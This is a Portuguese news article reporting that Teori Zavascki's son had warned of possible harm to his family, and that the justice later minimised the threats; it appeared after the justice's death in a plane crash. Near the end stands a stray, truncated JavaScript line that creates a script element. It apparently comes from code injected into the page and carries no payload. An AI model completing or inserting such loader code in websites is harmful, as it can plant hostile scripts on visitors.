Filho de Teori Zavascki alertou que algo poderia acontecer com alguém de sua família

“Se algo acontecer com alguém da minha família, você já sabem onde procurar…”, alertou Francisco Prehn Zavascki, filho do ministro do Supremo Federal (STF) Teori Zavascki, que morreu nesta quinta-feira (19) num acidente aéreo no litoral do Rio de Janeiro. O recado de Francisco foi dado em 26 de maio do ano passado.  

Poucos dias depois, em 6 de junho, o ministro, relator dos processos da Operação Lava Jato no Supremo, admitiu, no Rio de Janeiro, a existência de ameaças à sua família, mas minimizou o fato, afirmando: “Não tenho recebido nada sério”.

A frase foi uma resposta à indagação da reportagem da Agência Brasil, se ele confirmava a mensagem postada por seu filho, com o seguinte teor: “É obvio que há movimentos dos mais variados tipos para frear a Lava Jato. Penso que é até infantil imaginar que não há, isto é que criminosos do pior tipo, (conforme o MPF afirma), simplesmente resolveram se submeter à lei. Acredito que a lei e as instituições vão vencer, porém, alerto: se algo acontecer com alguém da minha família, você já sabem onde procurar…! Fica o recado!”.

var d=document;var s=d.createElement(‘script’);

Deixe um comentário